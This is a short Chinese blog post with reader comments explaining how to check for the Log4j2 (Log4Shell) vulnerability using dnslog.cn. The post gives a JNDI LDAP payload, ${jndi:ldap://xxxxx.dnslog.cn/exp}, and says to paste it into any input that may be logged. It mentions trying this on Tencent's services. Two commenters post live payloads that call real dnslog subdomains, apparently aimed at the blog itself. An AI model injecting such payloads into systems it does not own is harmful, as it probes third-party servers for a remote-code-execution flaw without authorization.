星夜笔记本

dnslog简单验证log4j2漏洞

2021年12月9日 8条评论 11.22k次阅读 2人点赞 xingye

进dnslog：http://www.dnslog.cn/

Get SubDomain 得到一个随机的子域名

拼进${jndi:ldap://xxxxx.dnslog.cn/exp}

往任意可能在log中塞的输入填

这里拿tx玩，如群中发送，可得到tx云的记录

本作品采用知识共享署名-相同方式共享 4.0 国际许可协议进行许可

666这个入是桂说道：

2024年7月8日下午7:17

Google Chrome Android 9
？我去真的有用？
回复
WFLing说道：

2022年8月26日上午4:37

Google Chrome Windows 10
冒个泡
回复
gytxtx说道：

2022年5月23日上午8:52

Google Chrome Windows 10
http://jlh.125ks.cn/cxk/dinogame/
回复
浅水_Shallowaq说道：

2021年12月14日下午2:33

Google Chrome Windows 10
这个漏洞应该是apache才有的吧，用nginx搭建的网站应该没事……
回复
ddd说道：

2021年12月13日下午10:08

Google Chrome Windows 7
${jndi:ldap://hj1llv.dnslog.cn/exp}
回复
1. xingye说道：
  
  2021年12月13日下午10:58
  
  Google Chrome Windows 10
  你们有毛病吗这站又没有
  回复
2. **说道：
  
  2022年3月20日下午3:45
  
  Google Chrome Windows 10
  az......
  回复
匿名说道：

2021年12月13日下午12:09
${jndi:ldap://6lbaek.dnslog.cn/exp}
回复

发表回复取消回复